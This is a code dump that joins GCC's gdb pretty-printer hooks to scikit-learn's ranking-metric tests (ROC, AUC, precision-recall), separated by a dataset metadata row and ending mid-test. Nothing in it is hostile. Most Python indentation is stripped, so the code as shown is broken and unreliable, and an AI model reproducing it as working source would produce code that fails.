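#     '<tree 0x%x>' % intptr(gdbval)
# which yields the same 64-bit-safe value whether gdb embeds Python 2 or
# Python 3.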
class Tree:
"""
Wrapper around a gdb.Value for a tree, with various methods
corresponding to macros in gcc/tree.h
"""
def __init__(self, gdbval):
self.gdbval = gdbval
def is_nonnull(self):
return intptr(self.gdbval)
def TREE_CODE(self):
"""
Get gdb.Value corresponding to TREE_CODE (self)
as per:
#define TREE_CODE(NODE) ((enum tree_code) (NODE)->base.code)
"""
return self.gdbval['base']['code']
def DECL_NAME(self):
"""
Get Tree instance corresponding to DECL_NAME (self)
"""
return Tree(self.gdbval['decl_minimal']['name'])
def TYPE_NAME(self):
"""
Get Tree instance corresponding to result of TYPE_NAME (self)
"""
return Tree(self.gdbval['type_common']['name'])
def IDENTIFIER_POINTER(self):
"""
        Get str corresponding to result of IDENTIFIER_POINTER (self)
"""
return self.gdbval['identifier']['id']['str'].string()
class TreePrinter:
"Prints a tree"
def __init__ (self, gdbval):
self.gdbval = gdbval
self.node = Tree(gdbval)
def to_string (self):
# like gcc/print-tree.c:print_node_brief
# #define TREE_CODE(NODE) ((enum tree_code) (NODE)->base.code)
# tree_code_name[(int) TREE_CODE (node)])
if intptr(self.gdbval) == 0:
return '<tree 0x0>'
val_TREE_CODE = self.node.TREE_CODE()
# extern const enum tree_code_class tree_code_type[];
# #define TREE_CODE_CLASS(CODE) tree_code_type[(int) (CODE)]
val_tree_code_type = gdb.parse_and_eval('tree_code_type')
val_tclass = val_tree_code_type[val_TREE_CODE]
val_tree_code_name = gdb.parse_and_eval('tree_code_name')
val_code_name = val_tree_code_name[intptr(val_TREE_CODE)]
#print(val_code_name.string())
result = '<%s 0x%x' % (val_code_name.string(), intptr(self.gdbval))
if intptr(val_tclass) == tcc_declaration:
tree_DECL_NAME = self.node.DECL_NAME()
if tree_DECL_NAME.is_nonnull():
result += ' %s' % tree_DECL_NAME.IDENTIFIER_POINTER()
else:
pass # TODO: labels etc
elif intptr(val_tclass) == tcc_type:
tree_TYPE_NAME = Tree(self.gdbval['type_common']['name'])
if tree_TYPE_NAME.is_nonnull():
if tree_TYPE_NAME.TREE_CODE() == IDENTIFIER_NODE:
result += ' %s' % tree_TYPE_NAME.IDENTIFIER_POINTER()
elif tree_TYPE_NAME.TREE_CODE() == TYPE_DECL:
if tree_TYPE_NAME.DECL_NAME().is_nonnull():
result += ' %s' % tree_TYPE_NAME.DECL_NAME().IDENTIFIER_POINTER()
if self.node.TREE_CODE() == IDENTIFIER_NODE:
result += ' %s' % self.node.IDENTIFIER_POINTER()
# etc
result += '>'
return result
######################################################################
# Callgraph pretty-printers
######################################################################
class CGraphNodePrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<cgraph_node* 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
# symtab_node::name calls lang_hooks.decl_printable_name
# default implementation (lhd_decl_printable_name) is:
# return IDENTIFIER_POINTER (DECL_NAME (decl));
tree_decl = Tree(self.gdbval['decl'])
result += ' "%s"' % tree_decl.DECL_NAME().IDENTIFIER_POINTER()
result += '>'
return result
######################################################################
# Dwarf DIE pretty-printers
######################################################################
class DWDieRefPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
if intptr(self.gdbval) == 0:
return '<dw_die_ref 0x0>'
result = '<dw_die_ref 0x%x' % intptr(self.gdbval)
result += ' %s' % self.gdbval['die_tag']
if intptr(self.gdbval['die_parent']) != 0:
result += ' <parent=0x%x %s>' % (intptr(self.gdbval['die_parent']),
self.gdbval['die_parent']['die_tag'])
result += '>'
return result
######################################################################
class GimplePrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
if intptr(self.gdbval) == 0:
return '<gimple 0x0>'
val_gimple_code = self.gdbval['code']
val_gimple_code_name = gdb.parse_and_eval('gimple_code_name')
val_code_name = val_gimple_code_name[intptr(val_gimple_code)]
result = '<%s 0x%x' % (val_code_name.string(),
intptr(self.gdbval))
result += '>'
return result
######################################################################
# CFG pretty-printers
######################################################################
def bb_index_to_str(index):
if index == 0:
return 'ENTRY'
elif index == 1:
return 'EXIT'
else:
return '%i' % index
class BasicBlockPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<basic_block 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
result += ' (%s)' % bb_index_to_str(intptr(self.gdbval['index']))
result += '>'
return result
class CfgEdgePrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<edge 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
src = bb_index_to_str(intptr(self.gdbval['src']['index']))
dest = bb_index_to_str(intptr(self.gdbval['dest']['index']))
result += ' (%s -> %s)' % (src, dest)
result += '>'
return result
######################################################################
class Rtx:
def __init__(self, gdbval):
self.gdbval = gdbval
def GET_CODE(self):
return self.gdbval['code']
def GET_RTX_LENGTH(code):
val_rtx_length = gdb.parse_and_eval('rtx_length')
return intptr(val_rtx_length[code])
def GET_RTX_NAME(code):
val_rtx_name = gdb.parse_and_eval('rtx_name')
return val_rtx_name[code].string()
def GET_RTX_FORMAT(code):
val_rtx_format = gdb.parse_and_eval('rtx_format')
return val_rtx_format[code].string()
class RtxPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
self.rtx = Rtx(gdbval)
def to_string (self):
"""
For now, a cheap kludge: invoke the inferior's print
function to get a string to use the user, and return an empty
string for gdb
"""
# We use print_inline_rtx to avoid a trailing newline
gdb.execute('call print_inline_rtx (stderr, (const_rtx) %s, 0)'
% intptr(self.gdbval))
return ''
# or by hand; based on gcc/print-rtl.c:print_rtx
result = ('<rtx_def 0x%x'
% (intptr(self.gdbval)))
code = self.rtx.GET_CODE()
result += ' (%s' % GET_RTX_NAME(code)
format_ = GET_RTX_FORMAT(code)
for i in range(GET_RTX_LENGTH(code)):
print(format_[i])
result += ')>'
return result
######################################################################
class PassPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<opt_pass* 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
result += (' "%s"(%i)'
% (self.gdbval['name'].string(),
intptr(self.gdbval['static_pass_number'])))
result += '>'
return result
######################################################################
class VecPrinter:
# -ex "up" -ex "p bb->preds"
def __init__(self, gdbval):
self.gdbval = gdbval
def display_hint (self):
return 'array'
def to_string (self):
# A trivial implementation; prettyprinting the contents is done
# by gdb calling the "children" method below.
return '0x%x' % intptr(self.gdbval)
def children (self):
if intptr(self.gdbval) == 0:
return
m_vecpfx = self.gdbval['m_vecpfx']
m_num = m_vecpfx['m_num']
m_vecdata = self.gdbval['m_vecdata']
for i in range(m_num):
yield ('[%d]' % i, m_vecdata[i])
######################################################################
# TODO:
# * hashtab
# * location_t
class GdbSubprinter(gdb.printing.SubPrettyPrinter):
def __init__(self, name, class_):
super(GdbSubprinter, self).__init__(name)
self.class_ = class_
def handles_type(self, str_type):
raise NotImplementedError
class GdbSubprinterTypeList(GdbSubprinter):
"""
A GdbSubprinter that handles a specific set of types
"""
def __init__(self, str_types, name, class_):
super(GdbSubprinterTypeList, self).__init__(name, class_)
self.str_types = frozenset(str_types)
def handles_type(self, str_type):
return str_type in self.str_types
class GdbSubprinterRegex(GdbSubprinter):
"""
A GdbSubprinter that handles types that match a regex
"""
def __init__(self, regex, name, class_):
super(GdbSubprinterRegex, self).__init__(name, class_)
self.regex = re.compile(regex)
def handles_type(self, str_type):
return self.regex.match(str_type)
class GdbPrettyPrinters(gdb.printing.PrettyPrinter):
def __init__(self, name):
super(GdbPrettyPrinters, self).__init__(name, [])
    def add_printer_for_types(self, str_types, name, class_):
        self.subprinters.append(GdbSubprinterTypeList(str_types, name, class_))
    def add_printer_for_regex(self, regex, name, class_):
        self.subprinters.append(GdbSubprinterRegex(regex, name, class_))
def __call__(self, gdbval):
type_ = gdbval.type.unqualified()
str_type = str(type_)
for printer in self.subprinters:
if printer.enabled and printer.handles_type(str_type):
return printer.class_(gdbval)
# Couldn't find a pretty printer (or it was disabled):
return None
def build_pretty_printer():
pp = GdbPrettyPrinters('gcc')
pp.add_printer_for_types(['tree'],
'tree', TreePrinter)
pp.add_printer_for_types(['cgraph_node *'],
'cgraph_node', CGraphNodePrinter)
pp.add_printer_for_types(['dw_die_ref'],
'dw_die_ref', DWDieRefPrinter)
pp.add_printer_for_types(['gimple', 'gimple_statement_base *',
# Keep this in the same order as gimple.def:
'gimple_cond', 'const_gimple_cond',
'gimple_statement_cond *',
'gimple_debug', 'const_gimple_debug',
'gimple_statement_debug *',
'gimple_label', 'const_gimple_label',
'gimple_statement_label *',
'gimple_switch', 'const_gimple_switch',
'gimple_statement_switch *',
'gimple_assign', 'const_gimple_assign',
'gimple_statement_assign *',
'gimple_bind', 'const_gimple_bind',
'gimple_statement_bind *',
'gimple_phi', 'const_gimple_phi',
'gimple_statement_phi *'],
'gimple',
GimplePrinter)
pp.add_printer_for_types(['basic_block', 'basic_block_def *'],
'basic_block',
BasicBlockPrinter)
pp.add_printer_for_types(['edge', 'edge_def *'],
'edge',
CfgEdgePrinter)
pp.add_printer_for_types(['rtx_def *'], 'rtx_def', RtxPrinter)
pp.add_printer_for_types(['opt_pass *'], 'opt_pass', PassPrinter)
pp.add_printer_for_regex(r'vec<(\S+), (\S+), (\S+)> \*',
'vec',
VecPrinter)
return pp
gdb.printing.register_pretty_printer(
gdb.current_objfile(),
build_pretty_printer())
def find_gcc_source_dir():
# Use location of global "g" to locate the source tree
sym_g = gdb.lookup_global_symbol('g')
path = sym_g.symtab.filename # e.g. '../../src/gcc/context.h'
srcdir = os.path.split(path)[0] # e.g. '../../src/gcc'
return srcdir
class PassNames:
"""Parse passes.def, gathering a list of pass class names"""
def __init__(self):
srcdir = find_gcc_source_dir()
self.names = []
with open(os.path.join(srcdir, 'passes.def')) as f:
for line in f:
m = re.match('\s*NEXT_PASS \((.+)\);', line)
if m:
self.names.append(m.group(1))
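# Hedged illustration (the sample line is made up but follows the passes.def
# format the regex above expects): an entry such as
#     NEXT_PASS (pass_expand);
# matches '\s*NEXT_PASS \((.+)\);' and contributes the class name
# 'pass_expand' to self.names, which break-on-pass then offers for
# tab-completion.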
class BreakOnPass(gdb.Command):
"""
A custom command for putting breakpoints on the execute hook of passes.
This is largely a workaround for issues with tab-completion in gdb when
setting breakpoints on methods on classes within anonymous namespaces.
Example of use: putting a breakpoint on "final"
(gdb) break-on-pass
Press <TAB>; it autocompletes to "pass_":
(gdb) break-on-pass pass_
Press <TAB>:
Display all 219 possibilities? (y or n)
Press "n"; then type "f":
(gdb) break-on-pass pass_f
Press <TAB> to autocomplete to pass classnames beginning with "pass_f":
pass_fast_rtl_dce pass_fold_builtins
pass_feedback_split_functions pass_forwprop
pass_final pass_fre
pass_fixup_cfg pass_free_cfg
Type "in<TAB>" to complete to "pass_final":
(gdb) break-on-pass pass_final
...and hit <RETURN>:
Breakpoint 6 at 0x8396ba: file ../../src/gcc/final.c, line 4526.
...and we have a breakpoint set; continue execution:
(gdb) cont
Continuing.
Breakpoint 6, (anonymous namespace)::pass_final::execute (this=0x17fb990) at ../../src/gcc/final.c:4526
4526 virtual unsigned int execute (function *) { return rest_of_handle_final (); }
"""
def __init__(self):
gdb.Command.__init__(self, 'break-on-pass', gdb.COMMAND_BREAKPOINTS)
self.pass_names = None
def complete(self, text, word):
# Lazily load pass names:
if not self.pass_names:
self.pass_names = PassNames()
return [name
for name in sorted(self.pass_names.names)
if name.startswith(text)]
def invoke(self, arg, from_tty):
sym = '(anonymous namespace)::%s::execute' % arg
breakpoint = gdb.Breakpoint(sym)
BreakOnPass()
print('Successfully loaded GDB hooks for GCC')
| gpl-2.0 |
tmhm/scikit-learn | sklearn/metrics/tests/test_ranking.py | 127 | 40813 | from __future__ import division, print_function
import numpy as np
from itertools import product
import warnings
from scipy.sparse import csr_matrix
from sklearn import datasets
from sklearn import svm
from sklearn import ensemble
from sklearn.datasets import make_multilabel_classification
from sklearn.random_projection import sparse_random_matrix
from sklearn.utils.validation import check_array, check_consistent_length
from sklearn.utils.validation import check_random_state
from sklearn.utils.testing import assert_raises, clean_warning_registry
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_warns
from sklearn.metrics import auc
from sklearn.metrics import average_precision_score
from sklearn.metrics import coverage_error
from sklearn.metrics import label_ranking_average_precision_score
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import label_ranking_loss
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics.base import UndefinedMetricWarning
###############################################################################
# Utilities for testing
def make_prediction(dataset=None, binary=False):
"""Make some classification predictions on a toy dataset using a SVC
If binary is True restrict to a binary classification problem instead of a
multiclass classification problem
"""
if dataset is None:
# import some data to play with
dataset = datasets.load_iris()
X = dataset.data
y = dataset.target
if binary:
# restrict to a binary classification task
X, y = X[y < 2], y[y < 2]
n_samples, n_features = X.shape
p = np.arange(n_samples)
rng = check_random_state(37)
rng.shuffle(p)
X, y = X[p], y[p]
half = int(n_samples / 2)
# add noisy features to make the problem harder and avoid perfect results
rng = np.random.RandomState(0)
X = np.c_[X, rng.randn(n_samples, 200 * n_features)]
# run classifier, get class probabilities and label predictions
clf = svm.SVC(kernel='linear', probability=True, random_state=0)
probas_pred = clf.fit(X[:half], y[:half]).predict_proba(X[half:])
if binary:
# only interested in probabilities of the positive case
# XXX: do we really want a special API for the binary case?
probas_pred = probas_pred[:, 1]
y_pred = clf.predict(X[half:])
y_true = y[half:]
return y_true, y_pred, probas_pred
###############################################################################
# Tests
def _auc(y_true, y_score):
"""Alternative implementation to check for correctness of
`roc_auc_score`."""
pos_label = np.unique(y_true)[1]
# Count the number of times positive samples are correctly ranked above
# negative samples.
pos = y_score[y_true == pos_label]
neg = y_score[y_true != pos_label]
diff_matrix = pos.reshape(1, -1) - neg.reshape(-1, 1)
n_correct = np.sum(diff_matrix > 0)
return n_correct / float(len(pos) * len(neg))
def _average_precision(y_true, y_score):
"""Alternative implementation to check for correctness of
`average_precision_score`."""
pos_label = np.unique(y_true)[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1]
y_score = y_score[order]
y_true = y_true[order]
score = 0
for i in range(len(y_score)):
if y_true[i] == pos_label:
# Compute precision up to document i
# i.e, percentage of relevant documents up to document i.
prec = 0
for j in range(0, i + 1):
if y_true[j] == pos_label:
prec += 1.0
prec /= (i + 1.0)
score += prec
return score / n_pos
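def _demo_average_precision():
    # Hedged illustration (the toy arrays below are not part of the original
    # test-suite): the reference implementation above averages the precision
    # measured at the rank of each positive sample.  With these scores the
    # positives are ranked 1st and 3rd, so the result is (1/1 + 2/3) / 2.
    y_true = np.array([0, 0, 1, 1])
    y_score = np.array([0.1, 0.4, 0.35, 0.8])
    return _average_precision(y_true, y_score)  # ~0.833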
def test_roc_curve():
# Test Area under Receiver Operating Characteristic (ROC) curve
y_true, _, probas_pred = make_prediction(binary=True)
fpr, tpr, thresholds = roc_curve(y_true, probas_pred)
roc_auc = auc(fpr, tpr)
expected_auc = _auc(y_true, probas_pred)
assert_array_almost_equal(roc_auc, expected_auc, decimal=2)
assert_almost_equal(roc_auc, roc_auc_score(y_true, probas_pred))
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_end_points():
# Make sure that roc_curve returns a curve start at 0 and ending and
# 1 even in corner cases
rng = np.random.RandomState(0)
y_true = np.array([0] * 50 + [1] * 50)
y_pred = rng.randint(3, size=100)
fpr, tpr, thr = roc_curve(y_true, y_pred)
assert_equal(fpr[0], 0)
assert_equal(fpr[-1], 1)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thr.shape)
def test_roc_returns_consistency():
# Test whether the returned threshold matches up with tpr
# make small toy dataset
y_true, _, probas_pred = make_prediction(binary=True)
fpr, tpr, thresholds = roc_curve(y_true, probas_pred)
# use the given thresholds to determine the tpr
tpr_correct = []
for t in thresholds:
tp = np.sum((probas_pred >= t) & y_true)
p = np.sum(y_true)
tpr_correct.append(1.0 * tp / p)
# compare tpr and tpr_correct to see if the thresholds' order was correct
assert_array_almost_equal(tpr, tpr_correct, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_nonrepeating_thresholds():
# Test to ensure that we don't return spurious repeating thresholds.
# Duplicated thresholds can arise due to machine precision issues.
dataset = datasets.load_digits()
X = dataset['data']
y = dataset['target']
# This random forest classifier can only return probabilities
# significant to two decimal places
clf = ensemble.RandomForestClassifier(n_estimators=100, random_state=0)
# How well can the classifier predict whether a digit is less than 5?
# This task contributes floating point roundoff errors to the probabilities
train, test = slice(None, None, 2), slice(1, None, 2)
probas_pred = clf.fit(X[train], y[train]).predict_proba(X[test])
y_score = probas_pred[:, :5].sum(axis=1) # roundoff errors begin here
y_true = [yy < 5 for yy in y[test]]
# Check for repeating values in the thresholds
fpr, tpr, thresholds = roc_curve(y_true, y_score)
assert_equal(thresholds.size, np.unique(np.round(thresholds, 2)).size)
def test_roc_curve_multi():
# roc_curve not applicable for multi-class problems
y_true, _, probas_pred = make_prediction(binary=False)
assert_raises(ValueError, roc_curve, y_true, probas_pred)
def test_roc_curve_confidence():
# roc_curve for confidence scores
y_true, _, probas_pred = make_prediction(binary=True)
fpr, tpr, thresholds = roc_curve(y_true, probas_pred - 0.5)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.90, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_hard():
# roc_curve for hard decisions
y_true, pred, probas_pred = make_prediction(binary=True)
# always predict one
trivial_pred = np.ones(y_true.shape)
fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.50, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
# always predict zero
trivial_pred = np.zeros(y_true.shape)
fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.50, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
# hard decisions
fpr, tpr, thresholds = roc_curve(y_true, pred)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.78, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_one_label():
y_true = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
y_pred = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
# assert there are warnings
w = UndefinedMetricWarning
fpr, tpr, thresholds = assert_warns(w, roc_curve, y_true, y_pred)
# all true labels, all fpr should be nan
assert_array_equal(fpr,
np.nan * np.ones(len(thresholds)))
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
# assert there are warnings
fpr, tpr, thresholds = assert_warns(w, roc_curve,
[1 - x for x in y_true],
y_pred)
# all negative labels, all tpr should be nan
assert_array_equal(tpr,
np.nan * np.ones(len(thresholds)))
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_toydata():
# Binary classification
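# Note: the variables below are unpacked in reverse of roc_curve's
# (fpr, tpr, thresholds) return order, so the name 'tpr' holds the fpr
# values and vice versa; the expected arrays account for this ordering.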
y_true = [0, 1]
y_score = [0, 1]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [1, 1])
assert_almost_equal(roc_auc, 1.)
y_true = [0, 1]
y_score = [1, 0]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1, 1])
assert_array_almost_equal(fpr, [0, 0, 1])
assert_almost_equal(roc_auc, 0.)
y_true = [1, 0]
y_score = [1, 1]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [0, 1])
assert_almost_equal(roc_auc, 0.5)
y_true = [1, 0]
y_score = [1, 0]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [1, 1])
assert_almost_equal(roc_auc, 1.)
y_true = [1, 0]
y_score = [0.5, 0.5]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [0, 1])
assert_almost_equal(roc_auc, .5)
y_true = [0, 0]
y_score = [0.25, 0.75]
tpr, fpr, _ = roc_curve(y_true, y_score)
assert_raises(ValueError, roc_auc_score, y_true, y_score)
assert_array_almost_equal(tpr, [0., 0.5, 1.])
assert_array_almost_equal(fpr, [np.nan, np.nan, np.nan])
y_true = [1, 1]
y_score = [0.25, 0.75]
tpr, fpr, _ = roc_curve(y_true, y_score)
assert_raises(ValueError, roc_auc_score, y_true, y_score)
assert_array_almost_equal(tpr, [np.nan, np.nan])
assert_array_almost_equal(fpr, [0.5, 1.])
# Multi-label classification task
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [0, 1]])
assert_raises(ValueError, roc_auc_score, y_true, y_score, average="macro")
assert_raises(ValueError, roc_auc_score, y_true, y_score,
average="weighted")
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), 1.)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), 1.)
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_raises(ValueError, roc_auc_score, y_true, y_score, average="macro")
assert_raises(ValueError, roc_auc_score, y_true, y_score,
average="weighted")
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), 0.5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), 0.5)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_almost_equal(roc_auc_score(y_true, y_score, average="macro"), 0)
assert_almost_equal(roc_auc_score(y_true, y_score, average="weighted"), 0)
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), 0)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), 0)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0.5, 0.5], [0.5, 0.5]])
assert_almost_equal(roc_auc_score(y_true, y_score, average="macro"), .5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="weighted"), .5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), .5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), .5)
def test_auc():
# Test Area Under Curve (AUC) computation
x = [0, 1]
y = [0, 1]
assert_array_almost_equal(auc(x, y), 0.5)
x = [1, 0]
y = [0, 1]
assert_array_almost_equal(auc(x, y), 0.5)
x = [1, 0, 0]
y = [0, 1, 1]
assert_array_almost_equal(auc(x, y), 0.5)
x = [0, 1]
y = [1, 1]
assert_array_almost_equal(auc(x, y), 1)
x = [0, 0.5, 1]
y = [0, 0.5, 1]
assert_array_almost_equal(auc(x, y), 0.5)
def test_auc_duplicate_values():
# Test Area Under Curve (AUC) computation with duplicate values
# auc() was previously sorting the x and y arrays according to the indices
# from numpy.argsort(x), which was reordering the tied 0's in this example
# and resulting in an incorrect area computation. This test detects the
# error.
x = [-2.0, 0.0, 0.0, 0.0, 1.0]
y1 = [2.0, 0.0, 0.5, 1.0, 1.0]
y2 = [2.0, 1.0, 0.0, 0.5, 1.0]
y3 = [2.0, 1.0, 0.5, 0.0, 1.0]
for y in (y1, y2, y3):
assert_array_almost_equal(auc(x, y, reorder=True), 3.0)
def test_auc_errors():
# Incompatible shapes
assert_raises(ValueError, auc, [0.0, 0.5, 1.0], [0.1, 0.2])
# Too few x values
assert_raises(ValueError, auc, [0.0], [0.1])
# x is not in order
assert_raises(ValueError, auc, [1.0, 0.0, 0.5], [0.0, 0.0, 0.0])
def test_auc_score_non_binary_class():
# Test that roc_auc_score function returns an error when trying
# to compute AUC for non-binary class values.
rng = check_random_state(404)
y_pred = rng.rand(10)
# y_true contains only one class value
y_true = np.zeros(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = -np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
# y_true contains three different class values
y_true = rng.randint(0, 3, size=10)
assert_raise_message(ValueError, "multiclass format is not supported",
roc_auc_score, y_true, y_pred)
clean_warning_registry()
with warnings.catch_warnings(record=True):
rng = check_random_state(404)
y_pred = rng.rand(10)
# y_true contains only one class value
y_true = np.zeros(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = -np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
# y_true contains three different class values
y_true = rng.randint(0, 3, size=10)
assert_raise_message(ValueError, "multiclass format is not supported",
roc_auc_score, y_true, y_pred)
def test_precision_recall_curve():
y_true, _, probas_pred = make_prediction(binary=True)
_test_precision_recall_curve(y_true, probas_pred)
# Use {-1, 1} for labels; make sure original labels aren't modified
y_true[np.where(y_true == 0)] = -1
y_true_copy = y_true.copy()
_test_precision_recall_curve(y_true, probas_pred)
assert_array_equal(y_true_copy, y_true)
labels = [1, 0, 0, 1]
predict_probas = [1, 2, 3, 4]
p, r, t = precision_recall_curve(labels, predict_probas)
assert_array_almost_equal(p, np.array([0.5, 0.33333333, 0.5, 1., 1.]))
assert_array_almost_equal(r, np.array([1., 0.5, 0.5, 0.5, 0.]))
assert_array_almost_equal(t, np.array([1, 2, 3, 4]))
assert_equal(p.size, r.size)
assert_equal(p.size, t.size + 1)
def test_precision_recall_curve_pos_label():
y_true, _, probas_pred = make_prediction(binary=False)
pos_label = 2
p, r, thresholds = precision_recall_curve(y_true,
probas_pred[:, pos_label],
pos_label=pos_label)
p2, r2, thresholds2 = precision_recall_curve(y_true == pos_label,
probas_pred[:, pos_label])
assert_array_almost_equal(p, p2)
assert_array_almost_equal(r, r2)
assert_array_almost_equal(thresholds, thresholds2)
assert_equal(p.size, r.size)
assert_equal(p.size, thresholds.size + 1)
def _test_precision_recall_curve(y_true, probas_pred):
# Test Precision-Recall and area under PR curve
p, r, thresholds = precision_recall_curve(y_true, probas_pred)
precision_recall_auc = auc(r, p)
assert_array_almost_equal(precision_recall_auc, 0.85, 2)
assert_array_almost_equal(precision_recall_auc,
average_precision_score(y_true, probas_pred))
assert_almost_equal(_average_precision(y_true, probas_pred),
precision_recall_auc, 1)
assert_equal(p.size, r.size)
assert_equal(p.size, thresholds.size + 1)
# Smoke test in the case of proba having only one value
p, r, thresholds = precision_recall_curve(y_true,
np.zeros_like(probas_pred))
precision_recall_auc = auc(r, p)
assert_array_almost_equal(precision_recall_auc, 0.75, 3)
assert_equal(p.size, r.size)
assert_equal(p.size, thresholds.size + 1)
def test_precision_recall_curve_errors():
# Contains non-binary labels
assert_raises(ValueError, precision_recall_curve,
[0, 1, 2], [[0.0], [1.0], [1.0]])
def test_precision_recall_curve_toydata():
with np.errstate(all="raise"):
# Binary classification
y_true = [0, 1]
y_score = [0, 1]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [1, 1])
assert_array_almost_equal(r, [1, 0])
assert_almost_equal(auc_prc, 1.)
y_true = [0, 1]
y_score = [1, 0]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [0.5, 0., 1.])
assert_array_almost_equal(r, [1., 0., 0.])
assert_almost_equal(auc_prc, 0.25)
y_true = [1, 0]
y_score = [1, 1]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [0.5, 1])
assert_array_almost_equal(r, [1., 0])
assert_almost_equal(auc_prc, .75)
y_true = [1, 0]
y_score = [1, 0]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [1, 1])
assert_array_almost_equal(r, [1, 0])
assert_almost_equal(auc_prc, 1.)
y_true = [1, 0]
y_score = [0.5, 0.5]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [0.5, 1])
assert_array_almost_equal(r, [1, 0.])
assert_almost_equal(auc_prc, .75)
y_true = [0, 0]
y_score = [0.25, 0.75]
assert_raises(Exception, precision_recall_curve, y_true, y_score)
assert_raises(Exception, average_precision_score, y_true, y_score)
y_true = [1, 1]
y_score = [0.25, 0.75]
p, r, _ = precision_recall_curve(y_true, y_score)
assert_almost_equal(average_precision_score(y_true, y_score), 1.)
assert_array_almost_equal(p, [1., 1., 1.])
assert_array_almost_equal(r, [1, 0.5, 0.])
# Multi-label classification task
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [0, 1]])
assert_raises(Exception, average_precision_score, y_true, y_score,
average="macro")
